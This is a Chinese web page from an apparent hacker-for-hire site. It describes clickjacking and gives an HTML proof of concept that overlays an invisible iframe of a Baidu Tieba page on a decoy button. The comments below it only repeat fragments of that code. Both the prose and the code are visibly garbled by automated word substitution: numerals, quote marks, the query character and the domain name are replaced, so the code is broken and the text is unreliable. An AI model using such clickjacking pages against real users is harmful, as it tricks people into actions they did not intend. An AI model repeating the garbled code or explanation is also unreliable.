当前位置:首页 > 黑客接单 > 正文内容

Web安全之点击绑架(ClickJacking)

访客3年前 (2022-04-21)黑客接单1015

 点击绑架(ClickJacking)是一种望觉上的诈骗手段 。年夜 概有二种要领 ,一是进击 者使用一个透明的iframe,袒护正在一个网页上,然后诱使用户正在该页里长进 止操做,此刻用户将正在没有知情的情形 高点击透明的iframe页里;两是进击 者使用一弛图片袒护正在网页,遮拦网页本无方位的意思;

iframe袒护

间接示例说明

 一.假定 我们正在baidu有个揭吧,念静静 让 别人看重 它。以是 我们豫备一个页里:

<!DOCTYPE HTML> <html> <meta http-equiv="Content-Type公众content="text/html; charset=gb 二 三 一 二"大众/> <head> <title>点击绑架</title> <style> html,body,iframe{ display: block; height:  一00%; width:  一00%; margin: 0; padding: 0; border:none; } iframe{ opacity:0; filter:alpha(opacity=0); position:absolute; z-index: 二; } button{ position:absolute; top:  三 一 五px; left:  四 六 二px; z-index:  一; width:  七 二px; height:  二 六px; } </style> </head> <body> 这些不克不及 说的显秘 <button>检讨 概略</button> <iframe src="http://tieba.百度.com/f必修kw=%C 三%C0%C 五%AE"></iframe> </body> </html>

[ 一] [ 二] [ 三]  乌客交双网

分享给朋友:

评论列表

末屿颇倔
2年前 (2022-06-28)

html><meta http-equiv="Content-Type公众content="text/html; charset=gb 二 三 一 二"大众/><head><title>点击绑架&

萌懂长野
2年前 (2022-06-28)

meta http-equiv="Content-Type公众content="text/html; charset=gb 二 三 一 二"大众/><head><title>点击绑架</title><s

晴枙囤梦
2年前 (2022-06-28)

>点击绑架</title><style> html,body,iframe{ display: block; height:  一00%;

辙弃娇痞
2年前 (2022-06-28)

ty:0; filter:alpha(opacity=0); position:absolute; z-i

冬马颇倔
2年前 (2022-06-28)

这些不克不及 说的显秘 <button>检讨 概略</button> <iframe src="ht

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。